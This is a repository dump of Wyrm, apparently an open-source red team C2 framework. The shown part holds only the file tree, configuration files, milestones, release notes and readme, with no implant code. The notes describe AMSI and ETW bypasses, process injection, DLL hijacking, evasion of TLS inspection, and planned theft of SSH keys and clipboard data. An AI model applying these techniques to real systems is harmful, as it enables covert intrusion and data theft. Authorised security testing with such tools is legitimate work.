Full Code of 0xflux/Wyrm for AI

master a6bb5093ed3c cached
171 files
693.8 KB
178.5k tokens
627 symbols
1 requests
Download .txt
Showing preview only (742K chars total). Download the full file or copy to clipboard to get everything.
Repository: 0xflux/Wyrm
Branch: master
Commit: a6bb5093ed3c
Files: 171
Total size: 693.8 KB

Directory structure:
gitextract_j_8agxu3/

├── .dockerignore
├── .gitignore
├── .vscode/
│   └── settings.json
├── CONTRIBUITIONS.md
├── Cargo.toml
├── LICENCE
├── Milestones.md
├── RELEASE_NOTES.md
├── Readme.md
├── c2/
│   ├── Cargo.toml
│   ├── Dockerfile
│   ├── Readme.md
│   ├── migrations/
│   │   ├── 20250614124105_agent_table.sql
│   │   ├── 20250614124140_add_sleep.sql
│   │   ├── 20250614132037_tasks.sql
│   │   ├── 20250615070633_flesh_table.sql
│   │   ├── 20250615072852_add_col_back_tasks.sql
│   │   ├── 20250615085223_add_uid.sql
│   │   ├── 20250615085245_add_uid.sql
│   │   ├── 20250615211204_rm_col_from_tasks.sql
│   │   ├── 20250616171233_ch_col.sql
│   │   ├── 20250619055731_results_table.sql
│   │   ├── 20250621175632_add_time.sql
│   │   ├── 20250621180355_add_time.sql
│   │   ├── 20250622075242_agent_staging.sql
│   │   ├── 20250622080004_protect_staging.sql
│   │   ├── 20250622080748_remove_constraint.sql
│   │   ├── 20250622083052_add_col_staging.sql
│   │   ├── 20250622094131_add_col_staging_again.sql
│   │   ├── 20250622094232_del_col_agent.sql
│   │   ├── 20250622122051_protect_pe_name.sql
│   │   ├── 20250622130349_port_to_agent_staging.sql
│   │   ├── 20250622154423_operator_table.sql
│   │   ├── 20250622161952_db_add_cstr.sql
│   │   ├── 20250624164511_col_for_toks.sql
│   │   ├── 20250627184526_default_env.sql
│   │   ├── 20250712164452_update_field_for_sleep.sql
│   │   ├── 20250712164815_update_field_for_prt.sql
│   │   ├── 20250712165040_update_field_for_prt_again.sql
│   │   ├── 20250719090503_rm_constraint_upload.sql
│   │   ├── 20250727101559_xor_payload.sql
│   │   ├── 20251025085314_update_time_completed_field.sql
│   │   ├── 20251026120715_change_dt_field.sql
│   │   ├── 20251026121136_change_dt_field_2.sql
│   │   ├── 20251026122000_time_comp_rm.sql
│   │   ├── 20251026144632_add_agent_id_to_ct.sql
│   │   ├── 20251119185937_add_pulled_col.sql
│   │   ├── 20251127184944_download_col.sql
│   │   ├── 20251127193415_make_bigint.sql
│   │   ├── 20251207091938_beacon_console_line.sql
│   │   ├── 20251207092341_testagent.sql
│   │   ├── 20251215120000_completed_tasks_pending_idx.sql
│   │   └── 20251215123000_tasks_fetched_default.sql
│   └── src/
│       ├── admin_task_dispatch/
│       │   ├── dispatch_table.rs
│       │   ├── execute.rs
│       │   ├── implant_builder.rs
│       │   └── mod.rs
│       ├── agents.rs
│       ├── api/
│       │   ├── admin_routes.rs
│       │   ├── agent_get.rs
│       │   ├── agent_post.rs
│       │   └── mod.rs
│       ├── app_state.rs
│       ├── db.rs
│       ├── exfil.rs
│       ├── logging.rs
│       ├── main.rs
│       ├── middleware.rs
│       ├── net.rs
│       ├── pe_utils/
│       │   ├── mod.rs
│       │   └── types.rs
│       └── profiles.rs
├── client/
│   ├── Caddyfile
│   ├── Cargo.toml
│   ├── Dockerfile
│   ├── index.html
│   ├── src/
│   │   ├── controller/
│   │   │   ├── build_profiles.rs
│   │   │   ├── dashboard.rs
│   │   │   └── mod.rs
│   │   ├── main.rs
│   │   ├── models/
│   │   │   ├── dashboard.rs
│   │   │   └── mod.rs
│   │   ├── net.rs
│   │   ├── pages/
│   │   │   ├── build_profiles.rs
│   │   │   ├── dashboard.rs
│   │   │   ├── file_upload.rs
│   │   │   ├── logged_in_headers.rs
│   │   │   ├── login.rs
│   │   │   ├── logout.rs
│   │   │   ├── mod.rs
│   │   │   └── staged_resources.rs
│   │   └── tasks/
│   │       ├── mod.rs
│   │       ├── task_dispatch.rs
│   │       ├── task_impl.rs
│   │       └── utils.rs
│   └── static/
│       ├── main_styles.css
│       └── styles.css
├── docker-compose.yml
├── implant/
│   ├── .cargo/
│   │   └── config.toml
│   ├── Cargo.toml
│   ├── Readme.md
│   ├── build.rs
│   ├── rust-toolchain.toml
│   ├── set_dbg_env.ps1
│   └── src/
│       ├── anti_sandbox/
│       │   ├── memory.rs
│       │   ├── mod.rs
│       │   └── trig.rs
│       ├── comms.rs
│       ├── entry.rs
│       ├── evasion/
│       │   ├── amsi.rs
│       │   ├── etw.rs
│       │   ├── mod.rs
│       │   └── veh.rs
│       ├── execute/
│       │   ├── dotnet.rs
│       │   ├── ffi.rs
│       │   └── mod.rs
│       ├── lib.rs
│       ├── main.rs
│       ├── main_svc.rs
│       ├── native/
│       │   ├── Readme.md
│       │   ├── accounts.rs
│       │   ├── filesystem.rs
│       │   ├── mod.rs
│       │   ├── processes.rs
│       │   ├── registry.rs
│       │   └── shell.rs
│       ├── spawn_inject/
│       │   ├── early_cascade.rs
│       │   ├── injection.rs
│       │   └── mod.rs
│       ├── stubs/
│       │   ├── mod.rs
│       │   ├── rdi.rs
│       │   └── shim.rs
│       ├── utils/
│       │   ├── allocate.rs
│       │   ├── comptime.rs
│       │   ├── console.rs
│       │   ├── export_comptime.rs
│       │   ├── mod.rs
│       │   ├── pe_stomp.rs
│       │   ├── proxy.rs
│       │   ├── strings.rs
│       │   ├── svc_controls.rs
│       │   └── time_utils.rs
│       ├── wofs/
│       │   └── mod.rs
│       └── wyrm.rs
├── loader/
│   ├── .cargo/
│   │   └── config.toml
│   ├── Cargo.toml
│   ├── build.rs
│   └── src/
│       ├── export_comptime.rs
│       ├── injector.rs
│       ├── lib.rs
│       ├── main.rs
│       ├── main_svc.rs
│       └── utils.rs
├── nginx/
│   └── nginx.conf
├── resources/
│   ├── .$wyrm_staging.drawio.bkp
│   └── wyrm.excalidraw
├── shared/
│   ├── Cargo.toml
│   ├── readme.md
│   └── src/
│       ├── lib.rs
│       ├── net.rs
│       ├── stomped_structs.rs
│       ├── task_types.rs
│       └── tasks.rs
├── shared_c2_client/
│   ├── Cargo.toml
│   ├── readme.md
│   └── src/
│       └── lib.rs
├── shared_no_std/
│   ├── Cargo.toml
│   └── src/
│       ├── export_resolver.rs
│       ├── lib.rs
│       └── memory.rs
└── wofs_static/
    └── Readme.md

================================================
FILE CONTENTS
================================================

================================================
FILE: .dockerignore
================================================
.git
.gitignore
**/target
**/*.pdb
**/*.exe
**/*.dll

================================================
FILE: .gitignore
================================================
c2/target
target
implant/target
client/target
client_v2/target
shared/target
shared_c2_client/target
/c2/staged_files/*
/c2/logs/*
/c2/loot/*
*Cargo.lock
*.exe
*.dll
*.svc
/client-leptos/dist
/client/dist
*.pem
c2_transfer/*
wofs_static/*
# But do track readme changes
!wofs_static/Readme.md

# Ignore user defined profiles, dont want to overwrite those
c2/profiles/*.toml
# Track the example profile - 
!c2/profiles/profile.example.toml

# Now the env file is setup, we want to ignore it for future commits to prevent overwriting.
.env
client-leptos/dist/index.html
client/dist/index.html


================================================
FILE: .vscode/settings.json
================================================
{
    "cSpell.words": [
        "AMSI",
        "antisandbox",
        "appdomain",
        "askama",
        "Autoloot",
        "AVEH",
        "BASERELOC",
        "bootstrapper",
        "BSTR",
        "canonicalise",
        "canonicalised",
        "checkin",
        "chrono",
        "clippy",
        "comptime",
        "conout",
        "creds",
        "crypter",
        "curproc",
        "dazy",
        "dbgprint",
        "deconflictions",
        "Deque",
        "derefs",
        "descript",
        "deser",
        "deserialise",
        "devlogs",
        "disasm",
        "DLLLOADED",
        "dont",
        "doppleganging",
        "dotenv",
        "dotenvy",
        "dotex",
        "doxtex",
        "entryp",
        "ENTRYW",
        "exfil",
        "FARPROC",
        "filesytem",
        "fingerprintable",
        "Flink",
        "funcs",
        "Ghostscale",
        "gitbook",
        "gloo",
        "HINSTANCE",
        "HKCR",
        "HKCU",
        "HKLM",
        "hmod",
        "HORIZ",
        "hres",
        "htmx",
        "icall",
        "Idek",
        "impr",
        "initialiser",
        "itemised",
        "kdbx",
        "keygen",
        "KHTML",
        "klist",
        "laxy",
        "ldapsearch",
        "Ldrp",
        "Leptos",
        "lfanew",
        "locationchange",
        "lpaddress",
        "lpsz",
        "LPTHREAD",
        "lstrlen",
        "luid",
        "macroise",
        "minreq",
        "MODULEINFO",
        "msvc",
        "MSVCRT",
        "nanos",
        "NGBP",
        "NGPB",
        "NOACCESS",
        "nonoverlapping",
        "nostd",
        "notif",
        "ntdll",
        "OPSEC",
        "ords",
        "Overwatch",
        "parray",
        "pathing",
        "PCSTR",
        "PCWSTR",
        "PFNSE",
        "pider",
        "PLAINTXT",
        "popstate",
        "postex",
        "ppid",
        "PROCESSENTRY",
        "psexec",
        "ptrs",
        "PWSTR",
        "rdata",
        "RDLL",
        "READWRITE",
        "recognised",
        "regq",
        "reloc",
        "repr",
        "reqwest",
        "retval",
        "RIID",
        "rngs",
        "RNTIME",
        "roff",
        "rotr",
        "Rubeus",
        "rundll",
        "runpoline",
        "rustc",
        "rustls",
        "rustup",
        "rwlock",
        "SAFEARRAY",
        "SAFEARRAYBOUND",
        "Seedable",
        "Serialise",
        "serialised",
        "serialising",
        "servertime",
        "Shellcode",
        "sideloaded",
        "sideloading",
        "Smkukx",
        "smth",
        "Smukx",
        "SNAPALL",
        "sqlx",
        "STARTUPINFO",
        "STARTUPINFOA",
        "STARTUPINFOEXA",
        "STARTUPINFOW",
        "strs",
        "subdirs",
        "svchost",
        "tchars",
        "termiantor",
        "thiserror",
        "thje",
        "timestomp",
        "timestomping",
        "Toolhelp",
        "TOPT",
        "trustedsec's",
        "turbofish",
        "Unaccess",
        "Uninit",
        "UNLEN",
        "ureq",
        "useragent",
        "Voidheart",
        "vtable",
        "Vtbl",
        "Whelpfire",
        "WINHTTP",
        "wofs",
        "WRITECOPY",
        "wyrm",
        "xored",
        "xwin",
        "yara"
    ],
    "[rust]": {
        "editor.defaultFormatter": "rust-lang.rust-analyzer",
        "editor.formatOnSave": true,
    },
    "cSpell.language": "en,en-GB",
    "rust-analyzer.procMacro.ignored": {
        "leptos_macro": [
            // optional:
            // "component",
            "server"
        ],
    },
    "rust-analyzer.cargo.features": "all",  // Enable all features
    "rust-analyzer.cargo.buildScripts.enable": true,
}

================================================
FILE: CONTRIBUITIONS.md
================================================
# Contributions

Contributions as PRs are not currently accepted.

Please use the issues tab or discussions as required.

The `.env` file should be removed from future commits - run `git update-index --skip-worktree .env` locally to ensure it is 
not tracked.

## Branch naming conventions

- `vx.y`: The main development branch for an upcoming release.
- `feat/*`: Implementing a new feature.
- `bug/*`: Fixing a bug, tracked against an issue number where relevant.
- `impr/*`: Improving something that already exists.

================================================
FILE: Cargo.toml
================================================
[workspace]
resolver = "2"
members = ["c2", "client", "implant", "loader", "shared", "shared_c2_client", "shared_no_std"] 


================================================
FILE: LICENCE
================================================
MIT License

Copyright (c) 2025 flux

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

================================================
FILE: Milestones.md
================================================
# Project Milestones

Any item with a (L) tag is a contribution which will not be live (or requires further decision making) as this is intended to be
developed as a premium or otherwise private feature. These will be few and far between.

## (L) Features (locked currently for public consumption)

1) [ ] NG Proxy Bypass (NGPB).
2) [ ] Additional loaders / start from RDLL - configurable, maybe things like early bird, syscalls, etc.
3) [ ] Image hashes in autoloot.
4) [ ] Runtime obfuscation, sleep masking - should spawn from the RDI bootstrap? Shellcode? Where and how? The RDI alloc for the actual DLL can just be encrypted?
5) [ ] **Entire** website clone, and serve download from named page.
6) [ ] Ransomware **SIMULATION** for Business
7) [ ] Execute dotnet in sacrificial process

### v0.7.3

1) [ ] `can_hijack`
   1) [ ] Specify a path to the image, and Wyrm tells you if you can SOH - this would be great for process injection without risking process injection triggers that an EDR could pick up
   2) [ ] Docs
2) [ ] The loader should inherit option for ETW bypass
3) [ ] `inject` malleable options (malleable options for it to inject on spawn from the default loader)
4) [ ] `spawn` should take a param (last position) if not in profile to spawn as
5) [ ] `spawn` should give the operator the pid of the spawned process
6) [ ] Go back and refactor `wyrm.rs` to use `task.deserialise_metadata::<InjectInnerForPayload>()` generics
7) [ ] Investigate inject behaviour in calc (some instability found on use)
8) [ ] C2 should have delete option for staged payloads

### v1.0 - Whelpfire

1) [ ] `jump psexec`
2) [ ] Final OPSEC review on binary indicators to make sure nothing is introduced in this version.
3) [ ] Max upload size set on C2 from profile
4) [ ] Logrotate setup &/ cargo clean?
5) [ ] Link additional modules at comptime into the C2 or agent (via profiles), e.g. to enable NGPB or other custom toolkits.
6) [ ] Separate URIs for POST and GET
7) [ ] Multiple URLs / IPs for C2
8) [ ] Round robin and different styles for URI & URL rotation
9) [ ] Can I tidy wyrm.rs, maybe dynamic dispatch and traits for main dispatch fn?
10) [ ] Loaders should stomp the MZ and "this program.."
11) [ ] Support domain fronting through HTTP headers in malleable profile (check in comms code `.with_header("Host", host)`)
12) [ ] Staging the encrypted payload as opposed to a stageless only build
13) [ ] When sideloaded no console output coming through
14) [ ] EDR shim removal? https://malwaretech.com/2024/02/bypassing-edrs-with-edr-preload.html
15) [ ] Can I make it x86?
16) [ ] Consider a javascript scripting kit (look at nuclei) (suggestion by @sindhwadrikunj)
17) [ ] Other spawn / inject options
18) [ ] WOF API's
    1)  [ ] C2 download file
    2)  [ ] C2 print info / print fail
19) [ ] Stack spoofing for unbacked memory
20) [ ] AMSI option in profile for classic bypass or VEH^2

### v1.1

These are to be split out further as required for more manageable releases.

1) [ ] Long running tasks which have a specified integrity level, so any task set under this scheme can execute at a given integrity level for that machine
2) [ ] Killing the agent should support from thread as well as from process (in the case of an injected process).
3) [ ] Agent & C2 supports multiple endpoints (selectable in build process from cli) / c2 profiles
   1) This needs to be implemented in the wizard also
4)  [ ] `zip` command to natively zip a folder
5)  [ ] Improve pillage function
6)  [ ] Concurrent removable media scanner - runs when main thread is sleeping between calls and looks for a removable disk being added. Auto-pillage.
   1)  [ ] The auto pillage file extensions should be specified in the profile toml
7)  [ ] Auto Escalator (this could be done a separate project that can be used by others, but also compiles into this):
    1)  [ ] User -> SYSTEM (service paths etc)
    2)  [ ] Local user -> Local Admin
    3)  [ ] Local Admin -> SYSTEM
8)  [ ] Improved anti-sandbox checks
9)  [ ] Additional lateral movement options
10) [ ] C2 junk padding response size (needs to play nice with NGPB)
11) [ ] Export agent db info for reporting
12) [ ] Read users clipboard continuously and upload to C2
13) [ ] Multiple C2 implementations on the agent. This could be a task which orders the creation on the implant itself.
14) [ ] Capture screenshots
15) [ ] Autoloot:
    1)  [ ] SSH keys
    2)  [ ] Filenames of office docs, .pdf, .jpg, .mov, .kdbx
16) [ ] Builds agent that can use APIs via hells/halos gate, etc.
    1)  [ ] Look at FreshyCalls as an alternate
17) [ ] Pool Party
18) [ ] C2 rotation strategy from profile
19) [ ] `cat`
20) [ ] `tasks` and `task_kill`
21) [ ] SOCKS proxy
22) [ ] Shellcode loader
23) [ ] C2 configurable so it is hosted on TOR, with C2 fronted redirectors into the TOR network
24) [ ] `drives` search for additional drive volumes
25) [ ] Scope / date / time checks
26) [ ] Add a note to an implant
27) [ ] Some UAC bypasses?
28) [ ] Specify specific proxy for agent to use

### Voidheart - v2.0

These are to be split out further as required for more manageable releases.

1) [ ] Run tools in memory and send output back to operator
2) [ ] C2 over DNS / DOH
3) [ ] SMB agents
4) [ ] Allow multiplayer
5) [ ] Time-stomping for builds & also agent can stomp files on target
6) [ ] Any inspiration from [trustedsec's BOFs](https://github.com/trustedsec/CS-Situational-Awareness-BOF) around some sitrep stuff this can do?
   1)  [ ] `ldapsearch`
7) [ ] 'Overwatch' system on the C2
8) [ ] TOPT
9)  [ ] Add ability to protect staged downloads with a header `key=value`, to try prevent mass downloading of an agent in cases where the operator wants it behind a check
10) [ ] Post Quantum Encryption for below TLS implant comms
11) [ ] Create multiple users 
    1)  [ ] Make implant multiplayer - this may need a bit of rearchitecting

### Ashen Crown - v3.0

1) [ ] Wyrm Rootkit release
2) [ ] Wyrm rootkit loader

### Ghostscale - v4.0

Nothing planned yet.

================================================
FILE: RELEASE_NOTES.md
================================================
# Release Notes

Anything found labelled with a '&#128679;' indicates a possible breaking change to a profile which you will need to adjust from
the `default.example.profile` found in `/c2/profiles/`. This is done so as not to overwrite your custom profiles when
pulling updates.

**IN ANY CASE ALWAYS BACKUP YOUR PROFILES BEFORE UPDATING!!!!**

## v0.7.2

- Makes stable the `spawn` command (x64 only) which now uses Early Cascade Injection to launch a new agent. There are question marks over the effectiveness of this against EDRs thanks to the work of [Smukx](https://x.com/5mukx/). Leaving in as the default now; further options to be explored before v1.0 is released.
- `Wyrm Object Files` are introduced which are small, self-contained code modules that are baked into the implant at compile time. This allows you to extend the functionality of Wyrm and bring in your custom tooling without having to understand the entire source code of Wyrm to implement additional custom functionality. You can simply invoke the wof at runtime via `wof <function_name> (optional input)`. See docs for full explanation.
- Process injection introduced via the `inject <payload> <pid>` command.
- Improves AMSI bypass technique by using [VEH Squared](https://fluxsec.red/vectored-exception-handling-squared-rust) instead of patching the function entry for AmsiScanBuffer.
- Reflective DLL stub now inherits the ETW patching option if specified in the profile.
- Significantly improves stability of C2 where resource exhaustion was happening because I used `scc` when trying to optimise some time ago; switched to a normal `HashMap` and `RwLock`s and it runs like a dream. Incidentally, this led to the server locking out. Further improved stability by reducing lock contention over awaits.
- Internal refactoring, nothing to write home about, but still nice improvements from a code perspective.
- Debug builds should print output to the debug console (accessible via DebugView) - thanks to [@c5pider](https://x.com/C5pider) and [@RastaMouse](https://x.com/_RastaMouse) for that idea :)

## v0.7.1

- Bug fix for the reflective DLL - it was not fully reflective in v0.7, I left some of the logic in the injector which has been migrated to the rDLL bootstrap mechanism. The rDLL should now be reflective from external tooling (so long as you start execution at the `Load` export).
- Introduces an **early preview** of the `spawn` command - you can spawn a new Wyrm agent impersonating `svchost`. To use this you must have either the loader or the raw payload (DLL version) on disk (on the target) and you can run it via: `spawn "path/to/dll"`. Bundling this in as there was the above critical update to the rDLL. It is **NOT** recommended you use this as I am still building it, if you want to, feel free - but it may break or trigger AV right now.

## v0.7

- Wyrm now builds as a reflective DLL, supplying you with a loader DLL, exe and svc in place of the previous raw binary. Meaning in your build, for each profile you now get
  - Raw binaries for when you wish to use them with your own loaders / toolsets (exe, svc and dll) where the DLL version is set up for **reflective** loading via the `Load` export. See the [docs](https://docs.wyrm-c2.com/implant/rdll.html) for more info on how to use the reflective loader export.
  - A loader using the reflective injector of the DLL, giving you an exe, svc and dll - all which load the rDLL into the **current** process. Support for process injection coming later. This is XOR 'encrypted' in the .text section of the loader.
- `pull` command now does so buffered in memory, preventing resource exhaustion from the implant.
- Native support for running `whoami` without needing to touch powershell. Run `whoami` to get info on the domain, user, SID and what privileges are assigned.
- Implant is now **proxy aware**! This means it will attempt to use a corporate proxy if set up for making connections. If none exists, then none will be used! This is done per request to ensure the correct proxy settings are applied to the correct C2 address if using multiple.
- Binary size of the postex payload almost HALVED! Down to about 800 kb!
- Fix logging on C2 to log correct IP with NGINX X-Forwarded-For header.
- Moved implant to reqwest crate for networking from minreq, no real impact on agent size and provides more functionality.
- Fix bug where implant tried to register a mutex when not specified.
- Fix bug in file upload via GUI to the C2 in that it happens much faster.
- Improve how the C2 handles panics and unwraps using `catch_panic`; the C2 should no longer become unresponsive during panics. Using panics and unwraps was by design, so this should add stability.
- Improved stability with the automatic DLL proxying for search order hijacking.

### Known Issues

- When the DLL is loaded via sideloading, no debug prints or console prints from dotnet tooling are captured.

## v0.6

- AMSI patching available in the implant via the malleable profile (only runs in the agent when necessary).
- You can now execute dotnet programs remotely in the agent, all in memory - does not write anything to disk! Simply run `dotex` and pass your args after, e.g. `dotex Rubeus.exe klist` (see below point as to how to get the binary sent to the agent)!
- This update introduces the `c2_transfer` dir in the root which is used for staging files to be internally used by the C2 during operations such as `dotex` where the payload is sent as bytes to the agent through C2. This folder is a bind mount meaning you can drop files in ad-hoc whilst the server is running and it should be able to read them. If you drop tools in here in a folder, make sure you include that in the path to the tool.
- Agent prints get sent to the server - meaning if you build in debug mode you can see the debug output in the terminal on the c2. This is mainly due to now removing the console window from the application.
- The CRT (C Runtime) is now statically linked into the binary so it can run on machines without the MSVCRT DLLs.
- Some nice UI changes
- Bug fix with parsing config on C2, some options were being left out under certain conditions.

## v 0.5.3

- Potential bug fix for the UI very occasionally not showing messages in the UI. Seems to be fixed.. but the bug happens so little it can be hard to diagnose.

## v 0.5.2

- DLL internals now allow for a better loading mechanism which ensures the DLL runs correctly, without early termination, whether launched via rundll32 or via DLL Search Order Hijacking.
- Malleable profile now provides support for fully fledged DLL Search Order Hijacking attacks! See docs for more info.
- Malleable profile now includes the ability to create a global mutex so you can ensure only one implant (profile) can run on the system, this could be useful for DLL sideloading / search order hijacking if the target is extremely noisy in terms of lots of subprocesses loading in the binary. You can of course have this applied to one profile, but not another, as it is fully optional.
- Improves the output of the `ps` and `reg query` commands.
- Added additional deserialisation option for output of `reg query` such that the `REG_BINARY` type gets decoded.

### Issues under investigation

There is still a very rare, small case where the first few instructions get dispatched and sent to the client, but don't appear in the console. They are logged in the browser store temporarily, but I think the bug is still here.. under investigation - extremely rare which is making it difficult to determine if it is still an issue.

## v 0.5.1

- Improved GUI updates! The dashboard message panel now looks much better, with newlines appearing properly, and spacing kept from the raw output. Colours have also been improved making it much easier to distinguish between message sections!
- Improved UI printing of the `ls` command.

## &#128679; v 0.5

### &#128679; Breaking changes

- Introduced the .svc binary which builds as part of your build package from the C2. There is a new required field in the profile, which is **svc_name**. Read more in the Wyrm Docs profile section as to how to use this field. In short, the value of this field (required) is passed to the Windows Service Control Manager when the service binary is run.

### Non-breaking changes

- Introduced the **string scrubber**!
  - The string scrubber automatically scrubs 'implant.dll' from the export name of the Wyrm DLL.
  - The string scrubber allows through a malleable profile the ability to scrub certain strings from the binary. **Warning:** this interprets bytes like for like and either allows you to replace them, or zero them out. This could lead to accidental pattern collisions with machine code / other artifacts, so if you are using this feature, be sure to test the binary before deployment on a red team op!
- Added download counter for staged resources (visible in new log file, and on the staged resources GUI page).
- Fixed bug (again..) that was preventing messages showing in the GUI, even though they were processed by the client. Hopefully that is the end of that bug!

## v 0.4.4

- Introduces the profile options to build custom DLL export names, as well as define custom machine code to run at an export. This could be used for DLL Sideloading (better support for that coming later, but it should still work in some cases), OPSEC, or just causing a bit of mayhem for a blue teamer.

## &#128679; v 0.4.3

- Investigated whether error logging was happening (the C2 hasn't generated an error in a long time) - confirmed error handling works as expected. This is good.
- Fixes bug which caused some results not to print to an agents console.
- Fixes bugs with file drop via the implant; now correctly drops a file in the 'in memory' working directory of the beacon.

### &#128679; Breaking changes

- Removed most of the environment variable requirements (see docs for instructions).
- This update brings a change to profiles! You now have one profile, and only one, which exists in the `c2/profiles/*.toml` file. You now specify multiple implants by key to build, or alternatively you can build all implant profiles by typing 'all' on the profile builder. See the [docs](https://docs.wyrm-c2.com/) for how to set the profile up, example is provided.

## v 0.4.2

- Fixes bug which prevented user logging into C2 for the first time if no user is created.

## &#128679; v 0.4.1

### &#128679; Breaking changes

- The C2 now uses nginx as part of the docker stack to serve the C2 over TLS. This was an important design decision whilst re-working the server; we are moving away from the previous method of authentication (which re-authenticates each time and will be more CPU intensive than required). Now, we use HTTPS secure cookies to enable the login sessions. Because of this change, you now need to generate a certificate and its private key, and they need to be placed into `/nginx/certs/` named `cert.pem` and `key.pem` respectively. For localhost testing, see my guide on [creating trusted certificates](https://fluxsec.red/wyrm-c2-localhost-self-signed-certificate-windows) locally - failing to do this will result in no connectivity on **localhost**. For prod, create a cert as you see fit (`certbot` / purchased certificates / from a CA, etc..) and add them to the `nginx/certs` dir, updating the `/nginx/nginx.conf` as necessary.
- As Wyrm now uses nginx via Docker, you need to configure the configuration file in `/nginx/nginx.conf`. This file is provided for you in git tracking. **Note:** when v0.4.1 is pushed, I will not be tracking changes to this file so that it doesn't accidentally break a build.
  - Edit `server_name` as appropriate for both HTTP and HTTPS.
  - Edit other settings as you see fit; note, the CORS stuff is mandatory as the GUI is separate from the server.
- You now log into the C2 entering the address of: https://localhost into the login panel (at http://localhost:3000)

### Non-breaking changes

- We now use a better, more efficient, and more secure authentication method of using actual auth HTTPS only tokens with a lifetime of **12 hrs** before you need to log in again to get a new token.
- Fix bug which caused tasks on implant to be dispatched out of order.
- Fixed bug causing console output to appear in the wrong order on the GUI.
- C2 now has docs! https://docs.wyrm-c2.com/

## &#128679; v 0.4

### &#128679; Breaking changes

- `.env` migrated from `/c2` to `/` - **THIS MAY AFFECT YOUR ADMIN TOKEN AND OTHER ENVIRONMENT SETTINGS, PLEASE BACK-UP BEFORE UPDATING**.
- Docker build pipeline for client now moved to workspace root rather than from within the `/client` directory. To build the client, now run (from the workspace root): `docker compose up -d --build client`.
- No more `install.sh`! You run the C2 via docker, simply with: `docker compose up -d --build  c2` from the root directory. This means you can run both the client and c2 via docker.
  - Client: `docker compose up -d --build client`.
  - C2: `docker compose up -d --build c2`.
- Loot, staged resources, and logs can be found in the docker volume /data.

### Non breaking changes

- OPSEC improvement with removing static artifacts from the binary.
- Introduces timestomping for the compile date on built implants - see `profile.example.toml` for full docs, but this optional profile option allows you to select a date in **British format** which is stamped into the binary as the compile date, aiding advanced OPSEC.
- Introduces the ability to export the completed tasks of the agent to a json file (for ingesting into ELK etc) by running the `export_db` command on an agent.
- Completed tasks now mapped to MITRE ATT&CK!
- Introduces the registry manipulation features with `reg query`, `reg delete` and `reg add` commands.
- Improve docker build process for the client through [cargo chef](https://lpalmieri.com/posts/fast-rust-docker-builds/).
- Implant supports `rm` to remove a file, and `rm_d` to remove a directory (and all its children).
- Adds user name who is running processes, as well as the ability to show processes running at a higher privilege (if running with high integrity).
- Improved how the system records time an action was completed, now properly represents the time the agent actually did the work, vs what was in place which was when the result was posted to the server and processed by the database.
- Improved HTTP packet ordering to be more concise and clear, using repr(C) to ensure consistent ordering under the new packet layout.

## v 0.3

This release introduces the new GUI, which is a web based UI used to interact with the Wyrm C2.

- New web based GUI!
- Docker is used to build and deploy the GUI, making it really straightforward.
- Building payloads now downloads as a 7zip archive through the browser.
  - Install `sh` script updated to include 7z dependencies, if manually updating through a pull; make sure you have 7zip installed and available on PATH.

## v 0.2

- Wyrm C2 now uses profiles to build agents with fully customisable configurations.
- IOCs are encrypted at compile time in the payload.
- Events Tracing for Windows (ETW) patching support via customisable profile.
- Profile options to determine log fidelity of the C2.
- Jitter supported in profile, as a percentage of the maximum sleep value time in seconds.
- Investigated apparent bug where results of running tasks appear out of order. The agent does not execute them out of order, this is a GUI display bug. Not fixing at this moment in time as I am building a new GUI for this in an upcoming pre-release version.

================================================
FILE: Readme.md
================================================
# Wyrm - v0.7.2 Hatchling

Wyrm (pronounced 'worm', an old English word for 'serpent' or 'dragon') is a post exploitation, open source, Red Team security testing framework, written in Rust, designed to be used by Red Teams, Purple Teams, 
Penetration Testers, and general infosec hobbyists. This project is fully built in Rust, with extra effort going into obfuscating artifacts which
could be present in memory. Project created and maintained by [flux](https://github.com/0xflux/), for **legal authorised security testing only**.

![Wyrm C2](resources/splash_example.png)

Read the docs at https://docs.wyrm-c2.com/ for quick setup instructions. Or jump in to read about [customisable profiles](https://docs.wyrm-c2.com/implant/profiles/), 
[evasion](https://docs.wyrm-c2.com/implant/profiles/evasion.html), and [obfuscation](https://docs.wyrm-c2.com/implant/profiles/obfuscation.html). The docs
will be updated as the project grows and gains more capabilities.

Pre-release version. If you want to support this project, please give it a star! I will be releasing updates and
devlogs on my [blog](https://fluxsec.red/) and [YouTube](https://www.youtube.com/@FluxSec) to document progress, so please give me a follow there.

**IMPORTANT**: Before pulling updates, check the [Release Notes](https://github.com/0xflux/Wyrm/blob/master/RELEASE_NOTES.md) for any 
breaking changes to profiles / configs which you may need to manually adjust or migrate. This is done especially so that updates do not
overwrite your local configs and agent profiles.

## Post exploitation Red Team framework

Wyrm currently supports only HTTPS agents using a custom encryption scheme for encrypting traffic below TLS, with a unique packet design so that
the packets cannot be realistically decrypted even under firewall level TLS inspection.

Updates are planned through versions 1.0, 2.0, 3.0, and 4.0. You can view
the planned roadmap in this project (see [Milestones.md](https://github.com/0xflux/Wyrm/blob/master/Milestones.md)). In time, this is designed to be an open source competitor to **Cobalt Strike**, **Mythic**, **Sliver**, etc.

For any bugs, or feature requests, please use the Issues tab, and for anything else - please use GitHub Discussions. I am active on this project,
so I will be attentive to anything raised.

### Features

- Implant uses a configurable profile to customise features and configurations
- You can customise the Wyrm agent via WOFs (Wyrm Object Files) which are statically linked C code or other language (Rust, etc) object files
- Fully reflective DLL model + a basic loader provided
- Access to raw binaries as well as ones prepared with a loader if you wish to use your own tooling with Wyrm
- Intuitive auto-DLL search order hijacking & sideloading features via profiles
- IOCs encrypted in the payload to assist in anti-analysis and anti-yara hardening
- Implant transmits data encrypted below TLS, defeating perimeter inspection security tools out the box
- Dynamic payload generation
